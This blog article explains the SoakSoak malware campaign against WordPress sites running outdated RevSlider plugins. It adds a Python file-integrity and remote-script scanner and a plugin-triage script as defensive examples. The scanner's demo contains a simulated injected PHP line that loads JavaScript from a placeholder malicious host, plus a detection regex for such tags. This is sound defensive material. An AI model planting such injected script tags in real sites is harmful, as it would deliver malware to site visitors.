Everything about SoakSoak Malware & Its Impact on the Blog-O-Sphere

Recently, more than 100,000 WordPress sites were affected by a vulnerable third-party plug-in, and this number is expected to increase further. The open-source WordPress blogging and content management system (CMS) is at heavy risk because of this third-party plug-in, and some site owners may not even realize that they are running it. Thousands of WordPress websites are thus susceptible to exploitation via this malware, known as SoakSoak.

The Attack

It is extremely important to understand how the SoakSoak malware functions, as WordPress is one of the most popular and widely used Web publishing platforms. Understanding how it works can help you prevent your WordPress site from being compromised.

Roughly one in six websites, nearly 60 million worldwide, are hosted on WordPress. The malware has been targeting WordPress sites for some time. The attackers behind it inject their malicious code into different JavaScript files, which means the damage could get even worse if it is not prevented.

Initially, the attackers targeted wp-includes/template-loader.php. Once that file has been compromised, the JavaScript created by the attackers is served on every page of the infected site, and this code then downloads malware from a remote domain. The attackers have since started modifying their tactics and have changed the JavaScript code that they target with the SoakSoak malware, thereby infecting a new group of websites.
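The two symptoms just described, a modified core file and a script tag that pulls JavaScript from a remote host, are both things a site owner can check for without waiting for a blacklist notice. The following scanner is an added example written for this article, not code from the article or from WordPress; it assumes a known-good hash manifest built from a clean copy of the same WordPress version, and the injected line and host name in the demo are constructed placeholders, not the actual malware or its domain.

```python
"""Scan a WordPress install for the two symptoms described above: a modified
core file (wp-includes/template-loader.php in the article's case) and a
<script> tag that pulls JavaScript from a remote host.
Added illustrative example; not code from the article."""
import hashlib
import pathlib
import re
import tempfile

# <script ... src="http://host/..."> or src="//host/..."; the host is group 1.
# Generic triage pattern written for this example, not a SoakSoak signature.
REMOTE_SCRIPT_RE = re.compile(
    r'<script[^>]*\ssrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.IGNORECASE)

SCANNED_SUFFIXES = ('.php', '.js')


def find_remote_script_hosts(text, allowed_hosts=()):
    """Return the remote hosts that <script src> tags in text load from,
    minus any hosts the site legitimately uses (CDNs, analytics)."""
    allowed = {a.lower() for a in allowed_hosts}
    hosts = {m.group(1).lower() for m in REMOTE_SCRIPT_RE.finditer(text)}
    return sorted(h for h in hosts if h not in allowed)


def sha256_file(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_manifest(root):
    """Map relative path -> SHA-256 for every PHP/JS file under root. In real
    use, build this from a clean copy of the same WordPress version, never
    from the live site you are about to check."""
    root = pathlib.Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob('*')
            if p.is_file() and p.suffix in SCANNED_SUFFIXES}


def scan_wordpress(root, manifest, allowed_hosts=()):
    """Return (relative_path, reason) findings: files whose hash no longer
    matches the manifest, files the manifest does not know about, and PHP
    files that emit a <script> tag loading JavaScript from a remote host."""
    findings = []
    root = pathlib.Path(root)
    for path in sorted(root.rglob('*')):
        if not path.is_file() or path.suffix not in SCANNED_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        if rel not in manifest:
            findings.append((rel, 'unexpected file: not in known-good manifest'))
        elif sha256_file(path) != manifest[rel]:
            findings.append((rel, 'modified: hash differs from known-good manifest'))
        if path.suffix == '.php':
            hosts = find_remote_script_hosts(path.read_text(errors='replace'), allowed_hosts)
            if hosts:
                findings.append((rel, 'loads remote JavaScript from ' + ', '.join(hosts)))
    return findings


def demo():
    """Build a miniature install in a temp directory, snapshot it, simulate the
    kind of injection the article describes, and scan. Every file here is a
    constructed stand-in; the host name is a placeholder, not the real domain."""
    with tempfile.TemporaryDirectory() as tmp:
        root = pathlib.Path(tmp)
        loader = root / 'wp-includes' / 'template-loader.php'
        loader.parent.mkdir(parents=True)
        loader.write_text("<?php\n// clean stand-in for the real loader\n"
                          "if ( is_404() ) { get_404_template(); }\n")
        (root / 'index.php').write_text("<?php\nrequire 'wp-blog-header.php';\n")
        manifest = build_manifest(root)          # snapshot of the clean state
        injected = ('<?php echo \'<script type="text/javascript" '
                    'src="http://malware-host.invalid/loader.js"></script>\'; ?>\n')
        loader.write_text(injected + loader.read_text())
        return scan_wordpress(root, manifest)


if __name__ == '__main__':
    for rel, reason in demo():
        print(f'{rel}: {reason}')
```

The hash comparison is the reliable signal: core files under wp-includes and wp-admin should never differ from a clean install of the same version. The remote-script check is only a triage aid, since themes and plugins legitimately load scripts from CDNs, which is what the allowed_hosts parameter is for; on a full site, restrict the scan to the core directories or exclude wp-content/uploads to keep the manifest manageable.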

Google has taken steps to deal with this issue by blacklisting thousands of sites infected by SoakSoak. The vulnerability was patched by the plugin’s developers, but websites that haven’t been updated are still exposed to these attacks.

The Impact

The SoakSoak malware has been infecting outdated versions of the WordPress plugin called RevSlider; essentially, the real vulnerability is in the RevSlider third-party plug-in. This plug-in is more often than not bundled in WordPress themes that site developers choose to install, and mostly versions prior to 4.2 are being targeted. The actual issue here is that RevSlider is a premium plugin: it cannot be easily upgraded, which is a disaster on its own for any site owner. Most users don’t even realize that this plug-in has been bundled into their WordPress themes.

As in many WordPress security cases, the main culprit in this scenario is the plugin. Plug-ins that are very outdated are unsafe and, unlike WordPress core, very difficult to upgrade. This is one reason why it is important for WordPress users to keep their systems on the latest versions of all plugins, so as to avoid other malware attacks.

The Solution

What can you do to prevent your WordPress site from being endangered? Uninstall any plugins that you aren’t using. Apparently, the minds behind the SoakSoak malware are tapping existing vulnerabilities in WordPress plugins as an easier method of spreading malware through WordPress sites. Most developers do not actively maintain and monitor the plug-ins they install, making them an easy doorway for attacking a website. Therefore, you need to ensure that you keep WordPress and its associated plugins updated.

While this may not sit well with the average WordPress site owner, the fact remains that updating or uninstalling unwanted plugins is among the best security practices. Security experts have always advised maintaining and updating all software and drivers regularly. Network administrators are well aware that it’s best to uninstall add-ons that will remain unused; failing that, they expose their server to an unnecessary risk.
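The advice above (remove unused plugins, update the rest, and pay special attention to a bundled premium plugin such as RevSlider below 4.2) can be turned into a routine triage of the plugin inventory. The script below is an added example, not code from the article or from WordPress. It works on a constructed sample shaped like the JSON that `wp plugin list --format=json` prints (name, status, update and version columns); the plugin names and versions in the sample are made up, and "revslider" is assumed to be the slug of the RevSlider plugin.

```python
"""Triage a WordPress plugin inventory along the lines the article recommends:
delete what is unused, update what is outdated, and escalate anything whose
installed version is below a known-safe minimum. Added example, not the
article's code."""
import json
import re

# Constructed sample shaped like `wp plugin list --format=json` output.
# Names and versions are made up; "revslider" is assumed to be the slug
# of the RevSlider plugin the article discusses.
SAMPLE_INVENTORY = json.dumps([
    {"name": "akismet", "status": "inactive", "update": "available", "version": "3.0.4"},
    {"name": "revslider", "status": "active", "update": "none", "version": "4.1.35"},
    {"name": "contact-form-7", "status": "active", "update": "available", "version": "4.0.3"},
    {"name": "jetpack", "status": "active", "update": "none", "version": "3.3"},
])

# Minimum safe versions. The article's one data point: RevSlider releases
# before 4.2 are the ones being targeted. Add your own advisories here.
MIN_SAFE_VERSION = {"revslider": "4.2"}


def parse_version(v):
    """'4.1.35' -> (4, 1, 35). Takes the leading digits of each dotted piece,
    so '4.2-beta' -> (4, 2); stops at the first piece without digits."""
    nums = []
    for piece in v.split('.'):
        m = re.match(r'\d+', piece)
        if not m:
            break
        nums.append(int(m.group()))
    return tuple(nums)


def version_below(installed, minimum):
    """Numeric comparison with zero-padding, so '4.10' > '4.2' and '4.2' == '4.2.0'."""
    a, b = parse_version(installed), parse_version(minimum)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))


def triage(inventory_json, min_safe=MIN_SAFE_VERSION):
    """Return (action, plugin, detail) tuples in inventory order."""
    actions = []
    for plugin in json.loads(inventory_json):
        name, version = plugin['name'], plugin['version']
        if plugin['status'] == 'inactive':
            # Unused plugin: remove it, whatever its version.
            actions.append(('delete', name, f'wp plugin delete {name}'))
            continue
        if name in min_safe and version_below(version, min_safe[name]):
            # A premium plugin bundled with a theme may report no update at
            # all, so the version table is what catches it, not the update flag.
            actions.append(('urgent', name,
                            f'{version} is below {min_safe[name]}; update or remove now'))
        elif plugin.get('update') == 'available':
            actions.append(('update', name, f'wp plugin update {name}'))
    return actions


if __name__ == '__main__':
    for action, name, detail in triage(SAMPLE_INVENTORY):
        print(f'{action:6} {name:16} {detail}')
```

The point of the separate version table is the case the article highlights: a premium plugin shipped inside a theme does not necessarily report an available update, so a check that only trusts the update column would leave an old RevSlider in place. Inactive plugins are flagged for deletion rather than update, since code that is installed but unused is still reachable on disk.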

We hope this was useful to you. Do leave your comments below.

Ajeet Mishra

Ajeet is a Senior Account Manager, who doesn't miss any weekends without playing CRICKET!